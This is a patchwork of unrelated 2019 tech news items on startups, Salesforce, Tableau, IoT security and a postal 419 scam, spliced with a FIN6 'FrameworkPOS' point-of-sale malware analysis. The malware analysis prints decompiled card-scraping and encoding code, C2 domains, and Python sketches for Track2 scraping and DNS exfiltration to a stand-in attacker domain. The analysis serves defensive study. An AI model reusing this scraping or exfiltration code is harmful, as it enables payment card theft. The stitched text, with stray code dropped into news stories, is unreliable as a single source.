Vianai emerges with $50M seed and a mission to simplify machine learning tech

You don’t see a startup get a $50 million seed round all that often, but such was the case with Vianai, an early stage startup launched by Vishal Sikka, former Infosys managing director and SAP executive. The company launched recently with a big check and a vision to transform machine learning.

Just this week, the startup had a coming out party at Oracle Open World where Sikka delivered one of the keynotes and demoed the product for attendees. Over the last couple of years, since he left Infosys, Sikka has been thinking about the impact of AI and machine learning on society and the way it is being delivered today. He didn’t much like what he saw.

It’s worth noting that Sikka got his Ph.D. from Stanford with a specialty in AI in 1996, so this isn’t something that’s new to him. What’s changed, as he points out, is the growing compute power and increasing amounts of data, all fueling the current AI push inside business. What he saw when he began exploring how companies implement AI and machine learning today was tooling that, in his view, was far more complex than it needed to be.

He saw dense Jupyter notebooks filled with code. He said that if you looked at a typical machine learning model, and stripped away all of the code, what you found was a series of mathematical expressions underlying the model. He had a vision of making that model-building more about the math, while building a highly visual data science platform from the ground up.

The company has been iterating on a solution over the last year with two core principles in mind: explorability and explainability, which involves interacting with the data and presenting it in a way that helps the user attain their goal faster than the current crop of model-building tools.

“It is about making the system reactive to what the user is doing, making it completely explorable, while making it possible for the developer to experiment with what’s happening in a way that is incredibly easy. To make it explainable means being able to go back and forth with the data and the model, using the model to understand the phenomenon that you’re trying to capture in the data,” Sikka told TechCrunch.

He says the tool isn’t just aimed at data scientists, it’s about business users and the data scientists sitting down together and iterating together to get the answers they are seeking, whether it’s finding a way to reduce user churn or discover fraud. These models do not live in a data science vacuum. They all have a business purpose, and he believes the only way to be successful with AI in the enterprise is to have both business users and data scientists sitting together at the same table working with the software to solve a specific problem, while taking advantage of one another’s expertise.

For Sikka, this means refining the actual problem you are trying to solve. “AI is about problem solving, but before you do the problem solving, there is also a [challenge around] finding and articulating a business problem that is relevant to businesses and that has a value to the organization,” he said.

He is very clear, that he isn’t looking to replace humans, but instead wants to use AI to augment human intelligence to solve actual human problems. He points out that this product is not automated machine learning (AutoML), which he considers a deeply flawed idea. “We are not here to automate the jobs of data science practitioners. We are here to augment them,” he said.

As for that massive seed round, Sikka knew it would take a big investment to build a vision like this, and with his reputation and connections, he felt it would be better to get one big investment up front so he could concentrate on building the product and the company. He says he was fortunate to have investors who believe in the vision, even though, as he says, no early business plan survives the test of reality. He didn’t name specific investors, referring only to friends and wealthy individuals and institutions. A company spokesperson reiterated that they were not revealing a list of investors at this time.

For now, the company has a new product and plenty of money in the bank to get to profitability, which he states is his ultimate goal. Sikka could have taken a job running a large organization, but like many startup founders, he saw a problem, and he had an idea how to solve it. That was a challenge he couldn’t resist pursuing.

FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals

The Zero2Hero malware course continues with Vitali Kremez diving into FIN6’s “FrameworkPOS”, which targets payment card data from Point-of-Sale (POS) or eCommerce systems.

Point-of-Sale (POS) malware remains an active threat in financial cybercrime. POS malware targets systems that run physical point-of-sale devices and operates by inspecting process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. Some of the most prolific recent POS malware families include “AlinaPOS”, “GlitchPOS”, and “FrameworkPOS”.

After the credit cards are first scanned in real time, the personal account number (PAN) and accompanying data sits in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. During that time, the point-of-sale malware opens up the process memory searching for elements related to credit card information.
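The scraping step described above can be sketched as a pattern hunt over raw process memory. The following is a minimal, illustrative Python sketch, not the malware's actual code; the regular expression approximates the Track2 layout of PAN, separator, expiry and service code.

```python
import re

# Illustrative only: a regex approximating the Track2 layout that POS
# scrapers hunt for in memory -- PAN (13-19 digits), '=' separator,
# expiry (YYMM), service code, then discretionary data.
TRACK2_RE = re.compile(rb";?(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\??")

def find_track2(memory: bytes):
    """Return (PAN, expiry YY, expiry MM, service code) tuples found in a buffer."""
    hits = []
    for m in TRACK2_RE.finditer(memory):
        pan, yy, mm, svc, _disc = m.groups()
        hits.append((pan.decode(), yy.decode(), mm.decode(), svc.decode()))
    return hits

# A synthetic buffer with one fake Track2 record embedded in junk bytes
sample = b"junk;4111111111111111=24121011234567890?junk"
print(find_track2(sample))
```

A real scraper iterates over memory regions read with ReadProcessMemory rather than a local byte string, but the matching idea is the same.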

The FrameworkPOS malware and related variants are linked to past high-profile merchant breaches, including the “MozartPOS” variant involved in the Home Depot intrusion.

POS malware becomes particularly relevant during the Fall shopping season (especially Black Friday), targeting businesses that handle live credit card transactions.

Click here to watch the full episode on Dissecting FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals

“FrameworkPOS” Malware Internals

One of the more interesting POS malware families is “FrameworkPOS” and its variants (including those dubbed “GratefulPOS” and “MozartPOS”). The most recent sample was internally named “psemonitor_x64.dll”. FrameworkPOS, also known as TRINITY, was previously linked to the financially motivated hacking collective called FIN6.

Some of the newly spotted FIN6 FrameworkPOS malware variants reveal that the group utilizes a 64-bit variant with two export functions, “workerIntstance” and “debugPoint”.

FIN6 FrameworkPOS malware

Notably, FrameworkPOS malware continues to have a low detection ratio on VirusTotal (as of September 18, 2019, only 9 out of 66 antivirus engines treat the malware as even suspicious).

For malware analysis purposes, we also analyze an earlier FrameworkPOS version with the purported “grp1” campaign identifier, which contains debug Track2 data, presumably for testing purposes.

The FrameworkPOS main function flow, pseudo-coded in C++ below, runs from creating the “caller” thread to building out the communication protocol and resolving the necessary host information.

The excerpt of the main malware functionality is as follows:

    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)caller, 0, 0, 0);

    while ( 1 )
    {
      time(&v11);
      hSnapshot = CreateToolhelp32Snapshot(2u, 0);
      if ( hSnapshot == (HANDLE)-1 )
        return 0;
      pe.dwSize = 296;

      if ( !Process32First(hSnapshot, &pe) )
        break;
      do
      {
        v8 = 0;
        for ( j = 0; j < 0x14; ++j )
        {
          if ( !strcmp(pe.szExeFile, &aWininit_exe[24 * j]) || strstr(byte_592010, pe.szExeFile) )
          {
            v8 = 1;
            break;
          }
        }
        if ( !v8 )
        {
          if ( pe.th32ProcessID )
          {
            dwProcessId = pe.th32ProcessID;
            v14 = 1;
            dword_592514 = 0;
            byte_59136B = 0;
            v89 = check_virtualQuery_ex(pe.th32ProcessID, 1);
            if ( v89 )
            {
              scan_memoryfor_card((int)v89);
              free((int)v89);
              _sleep(200u);
            }
          }
        }
      }
      while ( Process32Next(hSnapshot, &pe) );
      if ( dword_592410 > 0 )
        _sleep(10000u);
      CloseHandle(hSnapshot);
      time(&v15);
      v15 -= v11;
      localtime(&v15);
    }

The malware blacklists certain processes, such as “wininit.exe”, when it approaches memory scraping, in order to speed up the necessary card-scan logic.

Credit Card Scraping Logic & Luhn Algorithm

The malware also validates the card information by running the Luhn algorithm on any purported track data that does not begin with the digits “4” (VISA), “5” (Mastercard), “6” (Discover), “34” (AMEX), “37” (AMEX), “36” (Diner’s Club), or “300-305” (Diner’s Club).
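The Luhn check mentioned above is a simple mod-10 checksum. A compact Python version (a sketch of the algorithm, not the malware's own implementation) looks like this:

```python
def luhn_valid(pan: str) -> bool:
    """Luhn mod-10 check: double every second digit from the right,
    subtract 9 from any result over 9, and require the sum % 10 == 0."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        digit = int(ch)
        if i % 2 == 1:        # every second digit from the right
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0

print(luhn_valid("4111111111111111"))  # a well-known valid test PAN
print(luhn_valid("4111111111111112"))
```

Running the check cheaply weeds out byte sequences that merely look like track data, reducing false positives before exfiltration.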


The x64 malware version also contains an altered, “greedier” version of the Track1/Track2 scanner logic, focusing less on static card prefixes and service codes and instead matching any data that looks like Track1/Track2.

FIN6 x64 malware version

FrameworkPOS Data Encoding: XOR & Obfuscation

Throughout its execution, the malware builds some notable strings by XORing a byte section in a loop, *(&byte_memory++) ^= 0x4D (via a sequence of mov, xor, shl, movsx, and shl instructions). Malware coders often build string paths this way to bypass some static anti-virus detection.
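Because single-byte XOR is symmetric, the same loop that obfuscated a string also recovers it. A short Python sketch of decoding such strings with the 0x4D key follows; the string used is a hypothetical example, not one recovered from the sample.

```python
def xor_decode(blob: bytes, key: int = 0x4D) -> str:
    # Single-byte XOR is symmetric: the same operation both
    # obfuscates and recovers the string.
    return bytes(b ^ key for b in blob).decode("ascii")

# Hypothetical example string (not recovered from the sample):
obfuscated = bytes(c ^ 0x4D for c in b"cmd.exe")
print(xor_decode(obfuscated))  # -> cmd.exe
```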

FIN6 malware bypassing some static anti-virus detection

Notably, the FrameworkPOS malware obfuscates its stolen data by running it through a hardcoded substitution table, XORing each byte with the “AA” key, and converting the result into hexadecimals via an _snprintf API call:

size_t __cdecl enc_func(char *a1, int a2)
{
  size_t result;
  unsigned int i;
  for ( len_enc = 0; ; ++len_enc )
  {
    result = strlen(a1);
    if ( len_enc >= result )
      break;
    // substitution: replace the byte if it appears in the lookup table
    for ( i = 0; i < 69; ++i )
    {
      if ( (unsigned __int8)a1[len_enc] == byte_42E000[i] )
      {
        a1[len_enc] = byte_42E048[i];
        break;
      }
    }
    a1[len_enc] ^= AA_key;  // single-byte XOR with 0xAA
    // expand each byte to two hex characters in the output buffer
    _snprintf((char *)(a2 + 2 * len_enc), 2u, "%.2x", (unsigned __int8)a1[len_enc]);
  }
  return result;
}
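For clarity, here is a hedged Python re-implementation of the encoding logic above. The real substitution tables (byte_42E000/byte_42E048) are sample-specific and not reproduced here, so a made-up placeholder table stands in; the 0xAA XOR and the "%.2x" hex expansion mirror the decompiled code.

```python
# Placeholder substitution table: the real byte_42E000/byte_42E048
# tables are sample-specific and not reproduced here.
SUBST = {ord("0"): ord("Z"), ord("="): ord("#")}

def enc_func(data: bytes, key: int = 0xAA) -> str:
    out = []
    for b in data:
        b = SUBST.get(b, b)      # table substitution (69 entries in the sample)
        b ^= key                 # single-byte XOR with 0xAA
        out.append(f"{b:02x}")   # hex expansion, as in _snprintf("%.2x", ...)
    return "".join(out)

print(enc_func(b"41=0"))
```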

The XOR key function location is as follows:
Address          Function
--------------   -----------------
.text:004030DB   notice_write_func
.text:00403847   memory_parser
.text:00403873   memory_parser
.text:004039DE   memory_parser
.text:00406C43   computer_name_gen

Command & Control (C2) Protocol

Notably, the FrameworkPOS malware variant encodes exfiltrated data in hex after XORing it with the 0xAA byte key, then smuggles it out in hostname lookups (e.g., via ping requests), using the domain name system (DNS) as its exfiltration protocol.
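A hedged sketch of what that exfiltration pattern looks like in practice: data is XORed with 0xAA, hex-encoded, and chopped into DNS labels (63 bytes maximum each) prepended to an attacker-controlled domain. The domain name below is illustrative only, not an actual FIN6 indicator.

```python
def dns_exfil_names(data: bytes, domain: str = "ns.example-c2.com", key: int = 0xAA):
    """XOR, hex-encode, and split data into DNS-label-sized chunks."""
    hexed = "".join(f"{b ^ key:02x}" for b in data)
    # DNS labels are capped at 63 bytes each
    labels = [hexed[i:i + 63] for i in range(0, len(hexed), 63)]
    return [f"{label}.{domain}" for label in labels]

for name in dns_exfil_names(b"4111111111111111=2412"):
    print(name)
```

Queries for these names reach the attacker's authoritative name server, so the stolen data leaves the network even when direct outbound connections are blocked.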

Credit: @malz_intel

Indicators of Compromise (IOCs):

FrameworkPOS x86 SHA-256: 81cea9fe7cfe36e9f0f53489411ec10ddd5780dc1813ab19d26d2b7724ff3b38

FrameworkPOS x64 SHA-256: 7a207137e7b234e680116aa071f049c8472e4fb5990a38dab264d0a4cde126df

C2:

ns[.]akamai1811[.]com

ns[.]a193-45-3-47-deploy-akamaitechnologies[.]com


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

New Relic launches platform for developers to build custom apps

When Salesforce launched Force.com in 2007 as a place for developers to build applications on top of Salesforce, it was a pivotal moment for the concept of SaaS platforms. Since then, it’s been said that every enterprise SaaS company wants to be a platform play. Today, New Relic achieved that goal when it announced the New Relic One Observability Platform at the company’s FutureStack conference in New York City.

Company co-founder and CEO Lew Cirne explained that a platform, by definition, is something that other people can build software on. “What we are shipping is a set of capabilities to enable our customers and partners to build their own observability applications on the very same platform that we’ve built our product,” Cirne told TechCrunch.

He sees these third-party developers building applications to enable additional innovations on top of the New Relic platform that perhaps New Relic’s engineers couldn’t because of time and resource constraints. “There are so many use cases for this data, far more than the engineers that we have at our company could ever do, but a community of people who can do this together can totally unlock the power of this data,” Cirne said.

Like many platform companies, New Relic found that as it expanded its own offering, it needed a platform through which its developers could access a common set of services to build these additional offerings. As it built out this platform, it became possible to open it up so that external developers could access the same set of services as the New Relic engineering team.

“What we have is metrics, logs, events and traces coming from our customers’ digital software. So they have access to all that data in real time to build applications, measure the health of their digital business and build applications on top of that. Just as Force.com was the thing that really transformed Salesforce as a company into being a strategic vendor, we think the same thing will happen for us with what we’re offering,” he said.

As a proof point for the platform, the company is releasing a dozen open-source tools built on top of the New Relic platform today in conjunction with the announcement. One example is an application to help identify where companies could be over-spending on their AWS bills. “We’re actually finding 30-40% savings opportunities for them where they’re provisioning larger servers than they need for the workload. Based on the data that we’re analyzing, we’re recommending what the right size deployment should be,” Cirne said.

The New Relic One Observability Platform and the 12 free apps will be available starting today.

Quilt Data launches from stealth with free portal to access petabytes of public data

Quilt Data‘s founders, Kevin Moore and Aneesh Karve, have been hard at work for the last four years building a platform to search for data quickly across vast repositories on AWS S3 storage. The idea is to give data scientists a way to find data in S3 buckets, then package that data in forms that a business can use. Today, the company launched out of stealth with a free data search portal that not only proves what they can do, but also provides valuable access to 3.7 petabytes of public data across 23 S3 repositories.

The public data repository includes publicly available Amazon review data along with satellite images and other high-value public information. The product works like any search engine, where you enter a query, but instead of searching the web or an enterprise repository, it finds the results in S3 storage on AWS.

The results not only include the data you are looking for, but also all of the information around the data, such as Jupyter notebooks, the standard workspace that data scientists use to build machine learning models. Data scientists can then use this as the basis for building their own machine learning models.

The public data, which includes more than 10 billion objects, is a resource that data scientists should greatly appreciate, but Quilt Data is offering access to this data out of more than pure altruism. It’s doing so because it wants to show what the platform is capable of, and in the process hopes to get companies to use the commercial version of the product.


Quilt Data search results with data about the data found (Image: Quilt Data)

Customers can try Quilt Data for free or subscribe to the product in the Amazon Marketplace. The company charges a flat rate of $550 per month for each S3 bucket. It also offers an enterprise version with priority support, custom features and education and on-boarding for $999 per month for each S3 bucket.

The company was founded in 2015 and was a member of the Y Combinator Summer 2017 cohort. The company has received $4.2 million in seed money so far from Y Combinator, Vertex Ventures, Fuel Capital and Streamlined Ventures, along with other unnamed investors.

Yes, Your IoT Needs Security, Too

Gartner predicted that by the end of 2020 about 25% of attacks on enterprises will involve IoT devices. But investment in IoT security will not measure up to this risk level and is expected to account for only 10% of security spending, as organizations will likely prefer usability over security. The characteristics of traditional IoT security solutions will also hamper adoption, as these are usually cumbersome, expensive and don’t scale well.

IoT Devices Add to the Existing Number of Endpoints

If predictions by Gartner about future trends seem vague, look instead at the recent warning from Microsoft about Russian hackers breaching secured networks using simple IoT devices. And this is just the beginning. Today, there are 27 billion IoT devices. This number is expected to increase to 125 billion by 2030.

Many of these IoT devices will find their way into enterprises and onto enterprise networks, in the form of smart assistants (such as Alexa), IP cameras, smart thermostats and other devices, all aimed at increasing convenience and productivity. However, these devices also significantly increase an organization’s attack surface, adding to the burden of securing the most common IT device: the endpoint.

The Challenges of Securing IoT devices in the Corporate Environment

IoT devices and endpoints are similar in some ways – they are connected to the enterprise network, they have an IP address, and they have some computing power (depending on type and functionality). But unlike endpoints, IoT devices are usually not deployed in the same planned and organized manner; they are not built with security in mind, and they cannot run proper endpoint protection solutions due to their limited nature (memory size, type of OS, computing power).

Often, these “smart” devices are “rogue” or “shadow IT” devices, meaning they are brought in from outside the organization without the IT department’s knowledge or supervision, and are connected to the network via Wi-Fi, Bluetooth or another communication protocol, which makes them “transparent” to network monitoring tools. So the first challenge is to discover all these devices. The second challenge is to enforce organizational security and privacy policies regarding these devices (which is impossible to do if you haven’t even detected them). Last but not least, the organization needs to monitor these devices, identify suspicious behavior and respond if such activity is detected.

Existing Solutions Fall Short

Existing security products on the market try to tackle these challenges either by monitoring the traffic or by installing software agents on the devices themselves. The first approach usually requires adding physical appliances to the network and directing traffic there. Other products require capturing the traffic and uploading the logs to a server for processing. Both of these methods are difficult to implement and don’t scale well for organizations with multiple sites and network types. Deploying software agents on the devices themselves is even more impractical – it is possible only for very limited types of devices (security cameras), is not scalable, and does not cater for the “shadow” element in which users bring unsupervised devices into the network.  

SentinelOne solution – “IoT discovery and enforcement”

Aiming to better protect enterprises from the threat of IoT devices, SentinelOne took a different path: leveraging existing endpoint security agents as sensors, effectively turning every protected endpoint into a network detection device capable of identifying and controlling every IoT and connected device on a network. Utilizing endpoint security agents obviates the need to install additional equipment, which facilitates deployment. Once in use, the Ranger IoT security module identifies all connected devices and presents them to security analysts. Every new device that connects to the network is identified and added to the monitored-devices list.

Since it’s not enough to simply know you have a device on your network, the system fingerprints devices according to operating system and role. The devices are then presented by category (printers, mobile devices, Linux servers, and so on). Fingerprinting also allows alerting when a device is unmanaged or compromised, as it will act differently than other devices of the same category.
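As a rough illustration of the idea of passive fingerprinting (the actual Ranger logic is proprietary and far richer; the vendor and port tables below are invented for the example):

```python
# Invented lookup tables for the example: MAC OUI prefixes to vendors,
# and well-known ports to coarse device categories.
OUI_VENDORS = {"00:1b:63": "Apple", "b8:27:eb": "Raspberry Pi"}
PORT_HINTS = {9100: "printer", 554: "ip-camera", 22: "linux-server"}

def categorize(mac: str, open_ports: set):
    """Map simple network observables to a (vendor, category) guess."""
    vendor = OUI_VENDORS.get(mac.lower()[:8], "unknown")
    for port, category in PORT_HINTS.items():
        if port in open_ports:
            return vendor, category
    return vendor, "uncategorized"

print(categorize("B8:27:EB:12:34:56", {22, 80}))
```

A device that suddenly stops matching its category's expected behavior is exactly the kind of anomaly the alerting described above is meant to surface.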

Providing security teams with complete visibility, categorization and alerting regarding rogue devices and vulnerabilities, all from the same management console and without having to install additional systems, is the best way to ensure that enterprises proactively prepare for the imminent threat presented by IoT devices.



Salesforce is building an app to gauge a company’s sustainability progress

Salesforce has always tried to be a socially responsible company, encouraging employees to work in the community, giving 1% of its profits to different causes and building and productizing the 1-1-1 philanthropic model. The company now wants to help other organizations be more sustainable to reduce their carbon footprint, and today it announced it is working on a product to help.

Patrick Flynn, VP of sustainability at Salesforce, says that it sees sustainability as a key issue, and one that requires action right now. The question was how Salesforce could help. As a highly successful software company, it decided to put that particular set of skills to work on the problem.

“We’ve been thinking about how can Salesforce really take action in the face of climate change. Climate change is the biggest, most important and most complex challenge humans have ever faced, and we know right now, every individual, every company needs to step forward and do everything it can,” Flynn told TechCrunch.

And to that end, the company is developing the Salesforce Sustainability Cloud, to help track a company’s sustainability efforts. The tool should look familiar to Salesforce customers, but instead of tracking customers or sales, this tool tracks carbon emissions, renewable energy usage and how well a company is meeting its sustainability goals.


Image: Salesforce

The tool works with internal data and third-party data as needed, and is subject to both an internal audit by the Sustainability team and third-party organizations to be sure that Salesforce (and Sustainability Cloud customers) are meeting their goals.

Salesforce has been using this product internally to measure its own sustainability efforts, which Flynn leads. “We use the product to measure our footprint across all sorts of different aspects of our operations from data centers, public cloud, real estate — and we work with third-party providers everywhere we can to have them make their operations cleaner, and more powered by renewable energy and less carbon intensive,” he said. When there is carbon generated, the company uses carbon offsets to finance sustainability projects such as clean cookstoves or helping preserve the Amazon rainforest.

Flynn says increasingly the investor community is looking for proof that companies are building a real, verifiable sustainability program, and the Sustainability Cloud is an effort to provide that information both for Salesforce and for other companies that are in a similar position.

The product is in beta now and is expected to be ready next year. Flynn could not say how much they plan to charge for this service, but he said the goal of the product is positive social impact.

Hear Salesforce chairman, co-founder and CEO Marc Benioff discuss business as the greatest platform for change at Disrupt SF October 2-4. Get your passes to the biggest startup show around. 

Salesforce brings AI power to its search tool

Enterprise search tools have always suffered from the success of Google. Users wanted to find the content they needed internally in the same way they found it on the web. Enterprise search has never been able to meet those lofty expectations, but today Salesforce announced Einstein Search, an AI-powered search tool for Salesforce users that is designed to point them to the exact information for which they are looking.

Will Breetz, VP of product management at Salesforce, says that enterprise search has suffered over the years for a variety of reasons. “Enterprise search has gotten a bad rap, but deservedly so. Part of that is because in many ways it is more difficult than consumer search, and there’s a lot of headwinds,” Breetz explained.

To solve these issues, the company decided to bring the power of its Einstein artificial intelligence engine to bear on the problem. For starters, it might not know the popularity of a given topic the way Google does, but it can learn the behaviors of an individual and deliver a more meaningful answer based on a person’s profile, including geography and past activity.


Image: Salesforce

Next, it allows you to enter natural language search phrasing to find the exact information you need, and the search tool understands and delivers the results. For instance, you could enter, “my open opportunities in Boston” and using natural language understanding, the tool can translate that into the exact set of results you are looking for — your open opportunities in Boston. You could use conventional search to click a series of check boxes to narrow the list of results to only Boston, but this is faster and more efficient.
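To make the idea concrete, here is a purely illustrative sketch of the kind of phrase-to-filter mapping such a search layer performs. Einstein Search internals are not public; every field name below is an assumption for the example.

```python
def parse_query(query: str, current_user: str) -> dict:
    """Translate a natural-language phrase into structured CRM filters."""
    filters = {}
    q = query.lower()
    if q.startswith("my "):
        filters["owner"] = current_user          # "my ..." scopes to the user
    if "open" in q:
        filters["status"] = "Open"
    if "opportunities" in q:
        filters["object"] = "Opportunity"
    if " in " in q:
        filters["location"] = query.rsplit(" in ", 1)[1].strip().title()
    return filters

print(parse_query("my open opportunities in Boston", "jdoe"))
```

Real natural-language understanding uses trained models rather than keyword rules, but the output, a structured filter set, is the same shape.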

Finally, based on what the intelligence engine knows about you, and on your search parameters, it can predict the most likely actions you want to take and provide quick action buttons in the results to help you do that, reducing the time to action. It may not seem like much, but each reduced workflow adds up throughout a day, and the idea is to anticipate your requirements and help you get your work done more quickly.

Salesforce appears to have flipped the enterprise search problem. Instead of having a limited set of data being a handicap for enterprise search, it is taking advantage of that, and applying AI to help deliver more meaningful results. It’s for a limited set of findings for now, such as accounts, contacts and opportunities, but the company plans to add options over time.

Aliro comes out of stealth with $2.7M to ‘democratize’ quantum computing with developer tools

It’s still early days for quantum computing, but we’re nonetheless seeing an interesting group of startups emerging that are helping the world take advantage of the new technology now. Aliro Technologies, a Harvard startup that has built a platform for developers to code more easily for quantum environments — “write once, run anywhere” is one of the startup’s mottos — is today coming out of stealth and announcing its first funding of $2.7 million to get it off the ground.

The seed round is being led by Flybridge Capital Partners, with participation from Crosslink Ventures and Samsung NEXT’s Q Fund, a fund the corporate investor launched last year dedicated specifically to emerging areas like quantum computing and AI.

Aliro is wading into the market at a key moment in the development of quantum computing.

Vendors continue to build new quantum hardware to tackle the kinds of complex calculations that cannot be handled by current binary-based machines, for example around medicine discovery or multi-variable forecasting (just today IBM announced plans for a 53-qubit device). Even so, it’s widely acknowledged that the computers built so far face a number of critical problems that will hamper wide adoption.

The interesting development of recent times is the emergence of startups that are tackling these specific critical problems, dovetailing that progress with that of building the hardware itself. Take the fact that quantum machines so far have been too prone to error when used for extended amounts of time: last week, I wrote about a startup called Q-CTRL that has built firmware that sits on top of the machines to identify when errors are creeping in and provide fixes to stave off crashes.

The specific area that Aliro is addressing is the fact that quantum hardware is still very fragmented: each machine has its own proprietary language and operating techniques and sometimes even purpose for which it’s been optimised. It’s a landscape that is challenging for specialists to engage in, let alone the wider world of developers.

“We’re at the early stage of the hardware, where quantum computers have no standardisation, even those based on the same technology have different qubits (the basic building block of quantum activity) and connectivity. It’s like digital computing in 1940s,” said CEO and chairman Jim Ricotta. (The company is co-founded by Harvard computational materials science professor Prineha Narang along with Michael Cubeddu and Will Finegan, who are actually still undergraduate students at the university.)

“Because it’s a different style of computing, software developers are not used to quantum circuits,” said Ricotta, and engaging with them is “not the same as using procedural languages. There is a steep on-ramp from high-performance classical computing to quantum computing.”

While Aliro is coming out of stealth, it appears that the company is not being specific with details about how its platform actually works. But the basic idea is that Aliro’s platform will essentially be an engine that will let developers work in the languages that they know, and identify problems that they would like to solve; it will then assess the code and provide a channel for how to optimise that code and put it into quantum-ready language, and suggest the best machine to process the task.

The development points to an interesting way that we may well see quantum computing develop, at least in its early stages. Today, we have a handful of companies building and working on quantum computers, but there is still a question mark over whether these kinds of machines will ever be widely deployed, or if — like cloud computing — they will exist among a smaller amount of providers that will provide access to them on-demand, SaaS-style. Such a model would seem to fit with how much computing is sold today in the form of instances, and would open the door to large cloud names like Amazon, Google and Microsoft playing a big role in how this would be disseminated.

Such questions are still theoretical, of course, given some of the underlying problems that have yet to be fixed, but the march of progress seems inevitable, with forecasts predicting that quantum computing is likely to be a $2.2 billion industry by 2025, and if this is a route that is taken, the middlemen like Aliro could play an important role.

“I have been working with the Aliro team for the past year and could not be more excited about the opportunity to help them build a foundational company in Quantum Computing software,” said David Aronoff, general partner at Flybridge, in a statement. “Their innovative approach and unique combination of leading Quantum researchers and a world-class proven executive team make Aliro a formidable player in this exciting new sector.”

“At Samsung NEXT we are focused on what the world will look like in the future, helping to make that a reality,” said Ajay Singh of Samsung NEXT’s Q Fund, in a statement. “We were drawn to Prineha and her team by their impressive backgrounds and extent of research into quantum computing. We believe that Aliro’s unique software products will revolutionize the entire category, by speeding up the inflection point where quantum becomes as accessible as classical computing. This could have implications on anything from drug discovery, materials development or chemistry. Aliro’s ability to map quantum circuits to heterogeneous hardware in an efficient way will be truly transformative and we’re thrilled to be on this journey with them.”

Tableau update uses AI to increase speed to insight

Tableau was acquired by Salesforce earlier this year for $15.7 billion, but long before that, the company had been working on its fall update, and today it announced several new tools, including a new feature called “Explain Data” that uses AI to get to insight quickly.

“What Explain Data does is it moves users from understanding what happened to why it might have happened by automatically uncovering and explaining what’s going on in your data. So what we’ve done is we’ve embedded a sophisticated statistical engine in Tableau, that when launched automatically analyzes all the data on behalf of the user, and brings up possible explanations of the most relevant factors that are driving a particular data point,” Tableau chief product officer Francois Ajenstat explained.

He added that this saves users time by automatically doing the analysis for them, and it should help them do better analysis by removing biases and letting them dive deep into the data in an automated fashion.

Image: Explain Data highlighting an extreme value in the Superstore dataset (Tableau)

Ajenstat says this is a major improvement because users previously had to do all of this work manually. “So a human would have to go through every possible combination, and people would find incredible insights, but it was manually driven. Now with this engine, they are able to essentially drive automation to find those insights automatically for the users,” he said.

He says this has two major advantages: because it’s AI-driven, it can deliver meaningful insights much faster, and it also gives a more rigorous perspective on the data.

In addition, the company announced a new Catalog feature, which provides data breadcrumbs showing the source of the data, so users can know where it came from and whether it’s relevant and trustworthy.

Finally, the company announced a new server management tool that helps companies with broad Tableau deployments across a large organization manage them in a more centralized way.

All of these features are available starting today for Tableau customers.

Before He Spammed You, this Sly Prince Stalked Your Mailbox

A reader forwarded what he briefly imagined might be a bold, if potentially costly, innovation on the old Nigerian prince scam that asks for help squirreling away millions in unclaimed fortune: It was sent via the U.S. Postal Service, with a postmarked stamp and everything.

In truth, these old-fashioned “advance fee” or “419” scams predate email and have circulated via postal mail in various forms and countries over the years.

The recent one pictured below asks for help in laundering some $11.6 million tied to an important dead person who supposedly had access to a secret stash of cash. Any suckers who bite are strung along for weeks while imaginary extortionists or crooked employees at the relevant bureaucratic institutions demand licenses, bribes or other payments before disbursing any funds. Those funds never arrive, no matter how much money the sucker gives up.

This type of “advance fee” or “419” scam letter is common in email spam, but probably less so via USPS.

It’s easy to laugh at this letter, because it’s sometimes funny when scammers try so hard. But then again, maybe the joke’s on us, because sending these scams via USPS may make them even more effective at reaching the people most vulnerable: older individuals with access to cash but maybe not all their marbles.

Sure, the lure costs $0.55 up front. But a handful of successful responses to thousands of mailers could net fortunes for these guys phishing it old school.
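The economics above can be sketched with a quick back-of-envelope calculation. Aside from the $0.55 first-class stamp price mentioned in the article, every figure here (campaign size, response rate, average loss per victim) is a hypothetical assumption for illustration only:

```python
# Back-of-envelope economics of a postal 419 campaign.
# Only the stamp price comes from the article; the rest are assumptions.
STAMP_COST = 0.55             # USPS first-class postage per letter
letters_mailed = 10_000       # assumed campaign size
response_rate = 0.001         # assumed: 1 in 1,000 recipients bites
avg_loss_per_victim = 20_000  # assumed average "advance fee" extracted

postage = STAMP_COST * letters_mailed
victims = int(letters_mailed * response_rate)
gross_take = victims * avg_loss_per_victim

print(f"Postage outlay: ${postage:,.2f}")                    # $5,500.00
print(f"Victims: {victims}, gross take: ${gross_take:,.0f}")  # 10 victims, $200,000
```

Even under these made-up assumptions, a few thousand dollars in postage could return many times that amount, which is why the up-front cost of stamps is no real deterrent.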

The losses from these types of scams are hard to track because so many go unreported. But they are often perpetrated by the same people involved in romance scams online and in so-called “business email compromise” or BEC fraud, wherein the scammers try to spoof the boss at a major company in a bid to get a wire payment for an “urgent” (read: fraudulent) invoice.

These scam letters are sometimes called 419 scams in reference to the section of the penal code dealing with such crimes in Nigeria, a perennial source of 419 letter schemes. A recent bust of a Nigerian gang targeted by the FBI gives some perspective on the money-making abilities of these operations: a $10 million ring that was running such scams all day long.

Reportedly, in the first seven months of 2019 alone, the FBI received nearly 14,000 complaints reporting BEC scams, with total losses of around $1.1 billion, a figure that nearly matches losses reported for all of 2018.